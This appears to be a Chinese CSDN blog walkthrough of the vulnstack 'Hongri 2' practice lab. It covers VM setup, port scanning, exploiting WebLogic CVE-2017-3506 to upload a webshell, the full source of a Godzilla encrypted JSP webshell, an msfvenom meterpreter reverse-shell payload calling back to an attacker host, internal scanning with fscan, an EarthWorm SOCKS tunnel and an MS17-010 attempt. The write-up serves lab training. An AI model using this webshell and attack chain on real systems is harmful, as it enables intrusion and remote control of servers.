红日二靶场

已于 2024-01-24 20:08:34 修改
阅读量1k 收藏 20
点赞数 20
分类专栏: 红日靶场 文章标签: 红日二 python
于 2024-01-24 20:04:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woshicainiao666/article/details/135670985
版权

红日二靶场

靶场的搭建

靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

点击文件夹中的.vmx文件,进行打开
web靶机开始需要切换用户 de1ay/1qaz@WSX 登录
靶机密码都是1qaz@WSX
管理员Administrator/1qaz@WSX

配置环境

修改网络net模式的网段

在这里插入图片描述

添加一个网络地址,仅主机模式,网段为10.10.10.0/24

在这里插入图片描述

将三个靶机的都改为VMnet19,确定

在这里插入图片描述

web靶机,要将快照转为1.3版本,然后做一下步骤

通过切换用户,使用de1ay/1qaz@WSX进入web靶机,修改密码,然后直接注销退出

在这里插入图片描述
在这里插入图片描述

进入web之后,C:\Oracle\Middleware\user_projects\domains\base_domain

在这里插入图片描述

外网:192.168.111.0/24
内网:10.10.10.0/24

一,信息收集

1.网段探测

在这里插入图片描述

192.168.111.80:web服务器地址
192.168.111.201:pc地址

2.端口扫描

在这里插入图片描述

危险端口
445:smb服务,可能存在ms17-010漏洞
1433:mssql服务,可能存在爆破,注入,弱口令等
3389:存在远程桌面
7001:weblogic服务

二,渗透测试

1.漏洞发现

使用weblogicscan扫描

工具地址:https://github.com/rabbitmask/WeblogicScan

在这里插入图片描述

2.漏洞利用

┌──(root㉿kali)-[~/kali/Scan/WeblogicScan/CVE-2017-3506-master]
└─# java -jar WebLogic-XMLDecoder.jar -u http://192.168.111.80:7001
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
+----------------+------------------------------+-----------------------------------------------------------------+
|      Time      |             Status           |                                Host                             |
+----------------+------------------------------+-----------------------------------------------------------------+
|    01:55:07    |      [+] 漏洞存在            | http://192.168.111.80:7001/wls-wsat/test.logs
+----------------+------------------------------+-----------------------------------------------------------------+
                                                                                                                                                                                    
┌──(root㉿kali)-[~/kali/Scan/WeblogicScan/CVE-2017-3506-master]
└─# java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001 /wls-wsat/CoordinatorPortType11 shell.jsp
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Success
[+] http://192.168.111.80:7001/wls-wsat/shell.jsp?password=secfree&command=whoami

成功上传,访问

在这里插入图片描述

1.上传木马文件

挂代理,转包,将数据包中的恶意代码换成哥斯拉的jsp木马

vim /etc/proxychains4.conf
在这里插入图片描述

先打开bp,抓包,然后运行下代码

┌──(root㉿kali)-[~/kali/Scan/WeblogicScan/CVE-2017-3506-master]
└─# proxychains4 java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001 /wls-wsat/CoordinatorPortType11 shell.jsp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  192.168.111.80:7001  ...  OK

在这里插入图片描述

将【】中的数据换成哥斯拉的jsp

2.生成哥斯拉木马文件

在这里插入图片描述

┌──(root㉿kali)-[~/kali/muma]
└─# cat pass.jsp 
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>

在这里插入图片描述

3.连接哥斯拉

在这里插入图片描述

在这里插入图片描述

4.生成msf恶意程序

msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=7777 -f exe -o windows.exe
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=7777 -f exe -o windows.exe

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: windows.exe

5.本机开启监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp


msf6 exploit(multi/handler) > set lhost 192.168.111.128
lhost => 192.168.111.128

msf6 exploit(multi/handler) > set lport 7777
lport => 7777

msf6 exploit(multi/handler) > exploit

6.将生成的msf文件上传

在这里插入图片描述在这里插入图片描述

拿到meterpreter后
可以通过哥斯拉上传;也可以通过meterpreter中,upload命令上传
上传fscan.exe,扫描内网

C:\Oracle\Middleware\user_projects\domains\base_domain>.\fscan.exe -h 10.10.10.0/24
.\fscan.exe -h 10.10.10.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.1
start infoscan
已完成 0/0 listen ip4:icmp 0.0.0.0: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 10.10.10.1      is alive
(icmp) Target 10.10.10.10     is alive
(icmp) Target 10.10.10.80     is alive
[*] Icmp alive hosts len is: 3
10.10.10.10:445 open
10.10.10.1:445 open
10.10.10.80:139 open
10.10.10.10:88 open
10.10.10.80:7001 open
10.10.10.80:445 open
10.10.10.10:139 open
10.10.10.1:139 open
10.10.10.80:135 open
10.10.10.10:135 open
10.10.10.1:135 open
10.10.10.80:80 open
[*] alive ports len is: 12
start vulscan
[+] 10.10.10.80 MS17-010        (Windows Server 2008 R2 Standard 7601 Service Pack 1)
[*] 10.10.10.1           WORKGROUP\ROOT              
[*] 10.10.10.80          DE1AY\WEB               Windows Server 2008 R2 Standard 7601 Service Pack 1
[+] NetInfo:
[*]10.10.10.1
   [->]root
   [->]192.168.26.1
   [->]192.168.56.1
   [->]192.168.41.1
   [->]192.168.111.1
   [->]10.10.10.1
   [->]192.168.0.107
[+] NetInfo:
[*]10.10.10.10
   [->]DC
   [->]10.10.10.10
[+] 10.10.10.10 MS17-010        (Windows Server 2012 R2 Standard 9600)
[*] 10.10.10.10    [+]DC DE1AY\DC                Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://10.10.10.80        code:200 len:0      title:None
[*] WebTitle:http://10.10.10.80:7001   code:404 len:1164   title:Error 404--Not Found
[+] InfoScan:http://10.10.10.80:7001   [weblogic] 
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2019-2729-1 
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2020-14750 
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2017-10271 echo
已完成 12/12
[*] 扫描结束,耗时: 22.7696667s

发现内网中有10.10.10.10主机存活,10.10.10.80就是这台主机有永恒之蓝漏洞

3.永恒之蓝漏洞

1.EarthWorm隧道搭建

git clone https://github.com/idlefire/ew.git

1.首先在本机上监听端口

添加代理端口
vim /etc/proxychains4.conf
socks5 127.0.0.1 7086

┌──(root㉿kali)-[~/tools/ew]
└─# ./ew_for_linux64 -s rcsocks -l 7086 -e 8523
rcsocks 0.0.0.0:7086 <--[10000 usec]--> 0.0.0.0:8523
init cmd_server_for_rc here
start listen port here

2.将ew_for_Win.exe上传到靶机

ew_for_Win.exe -s rssocks -d 192.168.111.128 -e 8523

2.ms17-010

search ms17-010
use 0
set rhost 10.10.10.80
setg proxies socks5:127.0.0.1:7086
set ReverseAllowProxy true

在这里插入图片描述

呃,到这应该是可以拿到meterpreter的,结果一直出错,一看靶机。。。。。

在这里插入图片描述
没有保存快照,结束,不打了

郑 居中
关注
  • 20
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
红日安全-wp1
08-03
护网杯 Write up--红日安全迟来的签到base64 解密,得到如下结果:根据题目提示为 xor 异或,利用 c 语言撰写脚本利用 burp 爆破获得大辣
红日靶场2
weixin_48169878的博客
07-10 4591
1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
红日靶场()
qq_58091216的博客
05-02 1875
整体流程如下:信息收集 => weblogic漏洞利用 => 冰蝎连接上传大马 =>WEB主机上线CS => 内网信息收集 => MS17_010利用 => PTH => DC主机上线 => 挂代理3389登录PC主机 => 上传木马 => PC主机上线 => 构造黄金票据维权 => 痕迹清理。
红日内网渗透靶场2(ATK&CK红队评估实战靶场)
热门推荐
qq_45780190的博客
03-01 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 跟靶场一中的环境类似需要模拟内网和外网两个网段, PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。 PC配置如下: DC在该环境中充当是域控。DC配置如下 : WEB配置:需要两块网卡,相当于网关服务器。 这里需要将新增的网卡VMnet2,ip调成了10段。 网络配置完成,这三台虚拟主机默认开机密码都是:密码
vulnstack(红日)内网渗透靶场: 免杀360拿下域控
xf555er的博客
05-30 2096
当针对内网主机使用MSF进行永恒之蓝漏洞攻击失败时,一个替代方案是首先利用frp实现内网穿透,然后再进行漏洞利用。这种方法可能会产生意想不到的效果。我原本计划通过Meterpreter的portfwd命令将域控的3389端口映射到kali本地端口,随后使用rdesktop进行远程登录。然而,这一计划并未成功,我推测这可能是因为域控做了某些限制,只允许10.10.10.0/24网段的主机进行远程登录。
ATT&CK实战:红日靶场
学生
06-19 634
发现weblogic 使用工具注入内存马 ,上传正常的马子连接不上 ,因目标机器安装了360 会被杀掉 内存马有一定的免杀性。执行whoami命令 可知当前用户的权限为管理员权限 直接反弹shell到msf 方便操作。这里因为有360 所以getsystem命令并不能提权成功 可以使用进程迁移到高权限进程。哥斯拉填写开启msf的ip和监听端口 点击Go反弹到msf。\\DC.de1ay.com 的用户帐户。查看进程 发现很多system权限开启的进程。双网卡 10.10.10.80。
红日Web安全新手入门专刊.pdf
08-08
目录 1 web 安全新手入门指南 2 安全靶场实例分析
红日串词.doc
09-16
红日串词.doc
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
记一次红日靶场2的攻打记录
zhanqinli的博客
07-18 643
1、在配置好靶场环境和开启web服务后,开启kali对靶机进行扫描,可以看到靶机中的开启的445端口和7001端口都很有可能存在系统漏洞;1、接着使用CS自带插件portscan对内网10.10.10.0网段进行扫描,其中445端口都开启着,新建smb监听器来监听445端口,2、接着利用CS进行提权,接着我们利用它来对内网进行信息收集,首先查看主机的信息,以及系统的信息,引言:近日有空摸鱼,闲着无事打一下靶场、MSF和CS联动和内网信息收集。三、使用CS渗透内网。至此,渗透基本完成。
红日内网渗透靶场2
m0_62008601的博客
01-15 1771
学习内网渗透中,记录一下一些思路
ATT&CK红日靶场
hjxhjx1589的博客
07-28 1836
欢迎大家一起学习红日团队的靶场,可以学习域渗透,web,内网渗透等相关内容。
红日靶场-2
最新发布
分享
12-24 1562
红日靶场-2 . 喜欢吗?小猫......
红日靶场
qq_52469895的博客
03-28 561
目标主机所在的网络存在域环境,域名为de1ay.com,存在两台域主机WEB和PC,域控制器为DC.de1ay.com,主机名为DC,域管理员为Administrator。跟靶场一中的环境类似需要模拟内网和外网两个网段, PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。发现有双网卡,10.10.10.1/24和192.168.239.2网段,域控IP 10.10.10.10。注意WEB的这台服务器,切换用户 de1ay,密码也是1qaz@WSX。
红日-VulnStack靶场-ATT&CK(
braty_的博客
10-01 715
红日,cs横向移动
内网渗透实战——红日ATT&CK系列靶场)学习笔记
ierciyuan的博客
09-14 2806
内网渗透实战攻打红日靶场02,包括环境配置、信息收集、漏洞利用、内网渗透等操作。
红日靶场】vulnstack2-完整渗透过程
信安是不可或缺的一部分!
09-28 801
可以通过多种方式进行渗透测试这里只是我自己喜欢的方式,内网还能抓取hash等利用,在后面的红日靶场系列中会使用。
红日靶场
红队是青春
11-16 6976
红日靶场关 一、环境配置 环境说明 内网网段:10.10.10.1/24 DMZ网段:192.168.111.1/24 测试机地址:192.168.111.1(Windows),192.168.111.11(Linux) 防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问): deny all tcp ports:10.10.10.1 allow all tcp ports:10.10.10.0/24 配置信息 DC IP:10.10.10.10OS:Windows 2012(64) 应
红日靶场下载csdn
08-13
红日靶场是一个很受欢迎的网络安全实验平台,用于学习和锻炼网络攻防技术。由于该平台所提供的安全实验环境包含了许多常见的漏洞和攻击场景,因此在安全爱好者和专业人士中间都非常受欢迎。 要下载红日靶场,首先需要在CSDN(中国软件与技术服务股份有限公司)网站上搜索相关资源。CSDN是中国最大的IT技术社区和资源分享平台,用户可以在其网站上找到各种技术文档、开发工具和学习资源。 在CSDN网站上搜索红日靶场,可以找到一些与红日靶场相关的下载链接。用户可以根据自己的需求选择合适的下载链接,点击下载按钮即可开始下载。 下载过程可能需要一些时间,具体时间取决于网络连接速度和文件大小。一旦下载完成,用户可以根据下载的文件类型进行相应的安装或配置,以确保红日靶场能够正常运行。 如果在CSDN上找不到合适的下载资源,也可以尝试在其他一些技术资源网站或论坛上搜索红日靶场下载链接。同时,用户还可以考虑通过与其他网络安全爱好者或专业人士交流,获得更多关于红日靶场下载的信息和建议。 最后,下载红日靶场后,用户可以通过参与其中的各种实验和挑战,提升自己的网络安全技能,并加深对各种攻防技术的理解和应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值